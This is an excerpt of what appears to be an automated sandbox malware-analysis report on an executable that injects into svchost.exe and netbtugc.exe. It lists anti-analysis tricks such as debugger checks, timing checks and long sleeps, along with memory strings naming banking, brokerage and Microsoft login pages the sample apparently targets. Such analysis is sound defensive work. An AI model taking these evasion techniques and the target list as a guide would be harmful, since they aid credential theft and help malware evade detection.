            Source: Binary string: wntdll.pdbUGP source: r3T-ENQ-O-2024-10856.exe, 00000000.00000003.2087938778.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, r3T-ENQ-O-2024-10856.exe, 00000000.00000003.2087779315.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2583856799.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2483464557.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2485346788.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2583856799.0000000000CAE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3347694542.0000000003900000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3347694542.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2586450627.0000000003756000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2583695906.00000000035AC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: r3T-ENQ-O-2024-10856.exe, 00000000.00000003.2087938778.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, r3T-ENQ-O-2024-10856.exe, 00000000.00000003.2087779315.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2583856799.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2483464557.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2485346788.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2583856799.0000000000CAE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000006.00000002.3347694542.0000000003900000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3347694542.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2586450627.0000000003756000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2583695906.00000000035AC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2583741674.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547599411.000000000081A000.00000004.00000020.00020000.00000000.sdmp, rYmePGTGlPk.exe, 00000005.00000002.3346863401.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2583741674.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547599411.000000000081A000.00000004.00000020.00020000.00000000.sdmp, rYmePGTGlPk.exe, 00000005.00000002.3346863401.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
            Source: r3T-ENQ-O-2024-10856.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: r3T-ENQ-O-2024-10856.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: r3T-ENQ-O-2024-10856.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: r3T-ENQ-O-2024-10856.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: r3T-ENQ-O-2024-10856.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000E20F6 LoadLibraryA,GetProcAddress,0_2_000E20F6
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000A7795 push ecx; ret 0_2_000A77A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0038A883 push FFFFFFC7h; retf 2_2_0038AA9A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003836B0 push eax; ret 2_2_003836B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0038AEA4 push cs; retf 2_2_0038AEAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003887F2 push ecx; iretd 2_2_003887FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B1225F pushad ; ret 2_2_00B127F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B127FA pushad ; ret 2_2_00B127F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B1283D push eax; iretd 2_2_00B12858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B409AD push ecx; mov dword ptr [esp], ecx2_2_00B409B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B11200 push eax; iretd 2_2_00B11369
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B19939 push es; iretd 2_2_00B19940
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039309AD push ecx; mov dword ptr [esp], ecx6_2_039309B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0320513F push ecx; iretd 6_2_03205148
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0322017D push ebp; ret 6_2_032201F3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0321D1B3 push ebx; iretd 6_2_0321D1C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032071D0 push FFFFFFC7h; retf 6_2_032073E7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032110B0 push es; retf 6D50h6_2_0321119D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032077F1 push cs; retf 6_2_032077F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03220AAF push es; iretd 6_2_03220AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03220ACF push ds; iretd 6_2_03220AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0320DDB9 push ss; rep ret 6_2_0320DDC1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0320DDC3 push ss; rep ret 6_2_0320DDC1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03223C70 push edi; iretd 6_2_03223C7B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0381638E push cx; retf 6_2_03816390
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0381D23A pushad ; ret 6_2_0381D23C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_038170C9 push es; retf 6_2_038170D5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_038150E3 push 86FB9775h; ret 6_2_038150EA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0381EFC8 push ebx; iretd 6_2_0381F03E
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03815D94 push es; iretd 6_2_03815DA6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03815D22 pushad ; iretd 6_2_03815D23
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03815CFE push ecx; retf 6_2_03815D06
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_0009F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0009F78E
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000E7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_000E7F0E
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000A1E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_000A1E5A
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeAPI/Special instruction interceptor: Address: A52BFC
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B8096E rdtsc 2_2_00B8096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 4733Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 5239Jump to behavior
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeEvaded block: after key decisiongraph_0-109169
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeEvaded block: after key decisiongraph_0-109985
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeEvaded block: after key decisiongraph_0-109226
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeAPI coverage: 4.5 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 5032Thread sleep count: 4733 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 5032Thread sleep time: -9466000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 5032Thread sleep count: 5239 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 5032Thread sleep time: -10478000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe TID: 5228Thread sleep time: -35000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_0009DD92 GetFileAttributesW,FindFirstFileW,FindClose,0_2_0009DD92
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000D2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000D2044
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000D219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000D219F
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000D24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_000D24A9
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000C6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_000C6B3F
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000C6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_000C6E4A
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000CF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_000CF350
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000CFD47 FindFirstFileW,FindClose,0_2_000CFD47
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000CFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_000CFDD2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0321C0D0 FindFirstFileW,FindNextFileW,FindClose,6_2_0321C0D0
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_0009E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0009E47B
            Source: 1m0Sa73J8.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 1m0Sa73J8.6.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 1m0Sa73J8.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 1m0Sa73J8.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 1m0Sa73J8.6.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 1m0Sa73J8.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 1m0Sa73J8.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 1m0Sa73J8.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 1m0Sa73J8.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: 1m0Sa73J8.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 1m0Sa73J8.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 1m0Sa73J8.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 1m0Sa73J8.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 1m0Sa73J8.6.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 1m0Sa73J8.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: rYmePGTGlPk.exe, 00000007.00000002.3346469113.0000000000DEF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2941828848.0000027B7AD4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 1m0Sa73J8.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 1m0Sa73J8.6.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: 1m0Sa73J8.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 1m0Sa73J8.6.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 1m0Sa73J8.6.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: 1m0Sa73J8.6.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: 1m0Sa73J8.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 1m0Sa73J8.6.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 1m0Sa73J8.6.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 1m0Sa73J8.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 1m0Sa73J8.6.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 1m0Sa73J8.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: netbtugc.exe, 00000006.00000002.3346397218.00000000033AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9(
            Source: 1m0Sa73J8.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 1m0Sa73J8.6.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 1m0Sa73J8.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 1m0Sa73J8.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B8096E rdtsc 2_2_00B8096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00397703 LdrLoadDll,2_2_00397703
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000D703C BlockInput,0_2_000D703C
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_0008374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,0_2_0008374E
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000B46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_000B46D0
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000E20F6 LoadLibraryA,GetProcAddress,0_2_000E20F6
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_00A51818 mov eax, dword ptr fs:[00000030h]0_2_00A51818
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_00A52EC8 mov eax, dword ptr fs:[00000030h]0_2_00A52EC8
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_00A52E68 mov eax, dword ptr fs:[00000030h]0_2_00A52E68
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B380A0 mov eax, dword ptr fs:[00000030h]2_2_00B380A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD80A8 mov eax, dword ptr fs:[00000030h]2_2_00BD80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4208A mov eax, dword ptr fs:[00000030h]2_2_00B4208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B3C0F0 mov eax, dword ptr fs:[00000030h]2_2_00B3C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B820F0 mov ecx, dword ptr fs:[00000030h]2_2_00B820F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B3A0E3 mov ecx, dword ptr fs:[00000030h]2_2_00B3A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC60E0 mov eax, dword ptr fs:[00000030h]2_2_00BC60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B480E9 mov eax, dword ptr fs:[00000030h]2_2_00B480E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC20DE mov eax, dword ptr fs:[00000030h]2_2_00BC20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C060B8 mov eax, dword ptr fs:[00000030h]2_2_00C060B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C060B8 mov ecx, dword ptr fs:[00000030h]2_2_00C060B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD6030 mov eax, dword ptr fs:[00000030h]2_2_00BD6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B3A020 mov eax, dword ptr fs:[00000030h]2_2_00B3A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B3C020 mov eax, dword ptr fs:[00000030h]2_2_00B3C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5E016 mov eax, dword ptr fs:[00000030h]2_2_00B5E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5E016 mov eax, dword ptr fs:[00000030h]2_2_00B5E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5E016 mov eax, dword ptr fs:[00000030h]2_2_00B5E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5E016 mov eax, dword ptr fs:[00000030h]2_2_00B5E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC4000 mov ecx, dword ptr fs:[00000030h]2_2_00BC4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE2000 mov eax, dword ptr fs:[00000030h]2_2_00BE2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE2000 mov eax, dword ptr fs:[00000030h]2_2_00BE2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE2000 mov eax, dword ptr fs:[00000030h]2_2_00BE2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE2000 mov eax, dword ptr fs:[00000030h]2_2_00BE2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE2000 mov eax, dword ptr fs:[00000030h]2_2_00BE2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE2000 mov eax, dword ptr fs:[00000030h]2_2_00BE2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE2000 mov eax, dword ptr fs:[00000030h]2_2_00BE2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE2000 mov eax, dword ptr fs:[00000030h]2_2_00BE2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6C073 mov eax, dword ptr fs:[00000030h]2_2_00B6C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B42050 mov eax, dword ptr fs:[00000030h]2_2_00B42050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC6050 mov eax, dword ptr fs:[00000030h]2_2_00BC6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C061C3 mov eax, dword ptr fs:[00000030h]2_2_00C061C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C061C3 mov eax, dword ptr fs:[00000030h]2_2_00C061C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC019F mov eax, dword ptr fs:[00000030h]2_2_00BC019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC019F mov eax, dword ptr fs:[00000030h]2_2_00BC019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC019F mov eax, dword ptr fs:[00000030h]2_2_00BC019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC019F mov eax, dword ptr fs:[00000030h]2_2_00BC019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B3A197 mov eax, dword ptr fs:[00000030h]2_2_00B3A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B3A197 mov eax, dword ptr fs:[00000030h]2_2_00B3A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B3A197 mov eax, dword ptr fs:[00000030h]2_2_00B3A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C161E5 mov eax, dword ptr fs:[00000030h]2_2_00C161E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BFC188 mov eax, dword ptr fs:[00000030h]2_2_00BFC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BFC188 mov eax, dword ptr fs:[00000030h]2_2_00BFC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B80185 mov eax, dword ptr fs:[00000030h]2_2_00B80185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE4180 mov eax, dword ptr fs:[00000030h]2_2_00BE4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE4180 mov eax, dword ptr fs:[00000030h]2_2_00BE4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B701F8 mov eax, dword ptr fs:[00000030h]2_2_00B701F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBE1D0 mov eax, dword ptr fs:[00000030h]2_2_00BBE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBE1D0 mov eax, dword ptr fs:[00000030h]2_2_00BBE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBE1D0 mov ecx, dword ptr fs:[00000030h]2_2_00BBE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBE1D0 mov eax, dword ptr fs:[00000030h]2_2_00BBE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBE1D0 mov eax, dword ptr fs:[00000030h]2_2_00BBE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B70124 mov eax, dword ptr fs:[00000030h]2_2_00B70124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C14164 mov eax, dword ptr fs:[00000030h]2_2_00C14164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C14164 mov eax, dword ptr fs:[00000030h]2_2_00C14164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BEA118 mov ecx, dword ptr fs:[00000030h]2_2_00BEA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BEA118 mov eax, dword ptr fs:[00000030h]2_2_00BEA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BEA118 mov eax, dword ptr fs:[00000030h]2_2_00BEA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BEA118 mov eax, dword ptr fs:[00000030h]2_2_00BEA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BEE10E mov eax, dword ptr fs:[00000030h]2_2_00BEE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BEE10E mov ecx, dword ptr fs:[00000030h]2_2_00BEE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BEE10E mov eax, dword ptr fs:[00000030h]2_2_00BEE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BEE10E mov eax, dword ptr fs:[00000030h]2_2_00BEE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BEE10E mov ecx, dword ptr fs:[00000030h]2_2_00BEE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BEE10E mov eax, dword ptr fs:[00000030h]2_2_00BEE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BEE10E mov eax, dword ptr fs:[00000030h]2_2_00BEE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BEE10E mov ecx, dword ptr fs:[00000030h]2_2_00BEE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BEE10E mov eax, dword ptr fs:[00000030h]2_2_00BEE10E
